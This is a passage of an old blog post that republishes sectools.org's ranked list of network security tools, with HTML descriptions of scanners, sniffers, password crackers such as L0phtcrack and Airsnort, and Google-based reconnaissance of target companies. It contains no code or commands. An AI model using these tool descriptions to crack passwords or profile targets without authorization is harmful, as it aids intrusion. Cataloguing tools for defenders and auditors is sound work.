href="http://sectools.org/index.html#netcat">Netcat</a> that works over a number of protocols and through a files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections. <p>See all <a href="http://sectools.org/netcats.html">Netcats</a> </p></td></tr></tbody></table><hr /><a name="sara"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#72</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">46</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www-arc.com/sara/"><img src="http://mirror.sectools.org/logos/sara-80x34.png" align="right" border="0" width="80" height="34" /></a> <a href="http://www-arc.com/sara/">Sara</a> : Security Auditor's Research Assistant<br />SARA is a vulnerability assessment tool derived from the infamous (at least in 1995) SATAN scanner. They ceased development after releasing version 7.9.1 in June 2009. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="qualysguard"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#73</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.qualys.com/"><img src="http://mirror.sectools.org/logos/qualysguard-80x87.png" align="right" border="0" width="80" height="87" /></a> <a href="http://www.qualys.com/">QualysGuard</a> : A web-based vulnerability scanner<br />Delivered as a service over the Web, QualysGuard eliminates the burden of deploying, maintaining, and updating vulnerability management software or implementing ad-hoc security applications. Clients securely access QualysGuard through an easy-to-use Web interface. QualysGuard features 5,000+ unique vulnerability checks, an Inference-based scanning engine, and automated daily updates to the QualysGuard vulnerability KnowledgeBase. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="clamav"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#74</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.clamav.net/"><img src="http://mirror.sectools.org/logos/clamav-94x83.png" align="right" border="0" width="94" height="83" /></a> <a href="http://www.clamav.net/">ClamAV</a> : A GPL anti-virus toolkit for UNIX<br />ClamAV is a powerful AntiVirus scanner focused towards integration with mail servers for attachment scanning. It provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via the Internet. Clam AntiVirus is based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. Most importantly, the virus database is kept up to date. </td></tr></tbody></table><hr /><a name="cheops"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#75</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">8</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <img src="http://mirror.sectools.org/logos/cheops-80x19.png" align="right" border="0" width="80" height="19" /> <a href="http://www.marko.net/cheops/">cheops</a> / <a href="http://cheops-ng.sourceforge.net/">cheops-ng</a> : Gives a simple interface to many network utilities, maps local or remote networks and identifies OS of machines<br />Cheops provides the functionality of many network utilities through a comfortable, powerful GUI. It has host/network discovery functionality as well as OS detection of hosts. Cheops-ng has the ability to probe hosts to see what services they are running. On some services, cheops-ng is actually able to see what program is running for a service and the version number of that program. The original Cheops program is currently not being developed or maintained so users are advised to use cheops-ng. </td></tr></tbody></table>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-44722631667381916452009-07-29T05:25:00.001-07:002009-07-29T05:25:40.254-07:00Top 100 Network Security Tools 26-50<p>Welcome to page 2 of the top network security tools site, covering tools ranked #26-50. Survey methedology and icon descriptions can be found on <a href="http://sectools.org/index.html">page 1</a>. <a name="perl-python"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#26</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.perl.org/">Perl</a> / <a href="http://www.python.org/">Python</a> / <a href="http://www.ruby-lang.org/">Ruby</a> : Portable, general-purpose scripting languages<br />While many canned security tools are available on this site for handling common tasks, scripting languages allow you to write your own (or modify existing ones) when you need something more custom. Quick, portable scripts can test, exploit, or even fix systems. Archives like <a href="http://www.cpan.org/">CPAN</a> are filled with modules such as <a href="http://www.ic.al.lg.ua/%7Eksv/">Net::RawIP</a> and protocol implementations to make your tasks even easier. </td></tr></tbody></table></p><hr /><a name="l0phtcrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#27</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">8</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.l0phtcrack.com/"><img src="http://mirror.sectools.org/logos/l0phtcrack-64x64.gif" align="right" border="0" width="64" height="64" /></a> <a href="http://www.l0phtcrack.com/">L0phtcrack</a> : Windows password auditing and recovery application<br />L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and <a href="http://www.l0phtcrack.com/">reborn as LC6 in 2009</a>. For free alternatives, consider <a href="http://ophcrack.sourceforge.net/">Ophcrack</a>, <a href="http://sectools.org/index.html#cain">Cain and Abel</a>, or <a href="http://sectools.org/index.html#john">John the Ripper</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="scapy"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#28</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.secdev.org/projects/scapy/">Scapy</a> : Interactive packet manipulation tool<br />Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. <p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="sam"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#29</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">16</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.samspade.org/ssw/">Sam Spade</a> : Freeware Windows network query tool<br />Sam Spade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more. Non-Windows users can enjoy online versions of many of their tools. </td></tr></tbody></table><hr /><a name="gnupg-pgp"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#30</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.gnupg.org/">GnuPG</a> / <a href="http://www.pgp.com/">PGP</a> : Secure your files and communication w/advanced encryption<br />PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses. <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="airsnort"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#31</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://airsnort.shmoo.com/"><img src="http://mirror.sectools.org/logos/airsnort-80x41.png" align="right" border="0" width="80" height="41" /></a> <a href="http://airsnort.shmoo.com/">Airsnort</a> : 802.11 WEP Encryption Cracking Tool<br />AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the <a href="http://www.shmoo.com/">Shmoo Group</a> and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar <a href="http://sectools.org/index.html#aircrack">Aircrack</a>. <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="backtrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#32</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.remote-exploit.org/index.php/BackTrack"><img src="http://mirror.sectools.org/logos/backtrack-80x76.png" align="right" border="0" width="80" height="76" /></a> <a href="http://www.remote-exploit.org/index.php/BackTrack">BackTrack</a> : An Innovative Penetration Testing live Linux distribution<br />This excellent bootable live-CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc. <p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="p0f"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#33</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://lcamtuf.coredump.cx/p0f.shtml"><img src="http://mirror.sectools.org/logos/p0f-80x99.png" align="right" border="0" width="80" height="99" /></a> <a href="http://lcamtuf.coredump.cx/p0f.shtml">P0f</a> : A versatile passive OS fingerprinting tool<br />P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall. P0f does not generate ANY additional network traffic, direct or indirect. No name lookups, no mysterious probes, no ARIN queries, nothing. In the hands of advanced users, P0f can detect firewall presence, NAT use, existence of load balancers, and more! <p>See all <a href="http://sectools.org/os-detectors.html">OS detection tools</a> </p></td></tr></tbody></table><hr /><a name="google"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#34</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.google.com/"><img src="http://mirror.sectools.org/logos/google-80x32.png" align="right" border="0" width="80" height="32" /></a> <a href="http://www.google.com/">Google</a> : Everyone's Favorite Search Engine<br />While it is far more than a security tool, Google's massive database is a good mind for security researchers and penetration testers. You can use it to dig up information about a target company by using directives such as “site:target-domain.com” and find employee names, sensitive information that they wrongly thought was hidden, vulnerable software installations, and more. Similarly, when a bug is found in yet another popular webapp, Google can often provide a list of vulnerable servers worldwide within seconds. The master of Google hacking is <a href="http://johnny.ihackstuff.com/">Johny Long</a>. Check out his <a href="http://johnny.ihackstuff.com/">Google Hacking Database</a> or his excellent book: <a href="http://www.amazon.com/dp/1597491764?tag=secbks-20">Google Hacking for Penetration Testers</a>. </td></tr></tbody></table><hr /><a name="webscarab"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#35</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"><img src="http://mirror.sectools.org/logos/webscarab-80x87.png" align="right" border="0" width="80" height="87" /></a> <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab</a> : A framework for analyzing applications that communicate using the HTTP and HTTPS protocols<br />In its simplest form, WebScarab records the conversations (requests and responses) that it observes, and allows the operator to review them in various ways. WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="ntop"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#36</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.ntop.org/"><img src="http://mirror.sectools.org/logos/ntop-80x42.png" align="right" border="0" width="80" height="42" /></a> <a href="http://www.ntop.org/">Ntop</a> : A network traffic usage monitor<br />Ntop shows network usage in a way similar to what top does for processes. In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a>, and <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="tripwire"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#37</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">22</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.tripwire.com/"><img src="http://mirror.sectools.org/logos/tripwire-80x30.png" align="right" border="0" width="80" height="30" /></a> <a href="http://www.tripwire.com/">Tripwire</a> : The grand-daddy of file integrity checkers<br />A file and directory integrity checker. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. Traditionally an open souce tool, Tripwire Corp is now focused on their commercial enterprise configuration control offerings. An open source Linux version can still be found at <a href="http://sourceforge.net/projects/tripwire/">SourceForge</a>. UNIX users may also want to consider <a href="http://www.cs.tut.fi/%7Erammer/aide.html">AIDE</a>, which has been designed to be a free Tripwire replacement. Or you may wish to investigate <a href="http://www.radmind.org/">Radmind</a>, <a href="http://sectools.org/tools3.html#rkhunter">RKHunter</a>, or <a href="http://sectools.org/tools3.html#chkrootkit">chkrootkit</a>. Windows users may like <a href="http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx">RootkitRevealer</a> from <a href="http://sectools.org/index.html#sysinternals">Sysinternals</a>. <p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="ngrep"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#38</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.packetfactory.net/projects/ngrep/">Ngrep</a> : Convenient packet matching & display<br />ngrep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular or hexadecimal expressions to match against data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands bpf filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a>, and <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="nbtscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#39</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">10</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.inetcat.net/software/nbtscan.html">Nbtscan</a> : Gathers NetBIOS info from Windows networks<br />NBTscan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address. The <a href="http://www.inetcat.net/software/nbtscan.html">original nbtscan</a> was written by Alla Bezroutchko. Steve Friedl has written an <a href="http://unixwiz.net/tools/nbtscan.html">alternate implementation</a>. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="webinspect"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#40</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.spidynamics.com/products/webinspect/"><img src="http://mirror.sectools.org/logos/webinspect-80x13.png" align="right" border="0" width="80" height="13" /></a> <a href="http://www.spidynamics.com/products/webinspect/">WebInspect</a> : A Powerful Web Application Scanner<br />SPI Dynamics' WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="openssl"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#41</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" 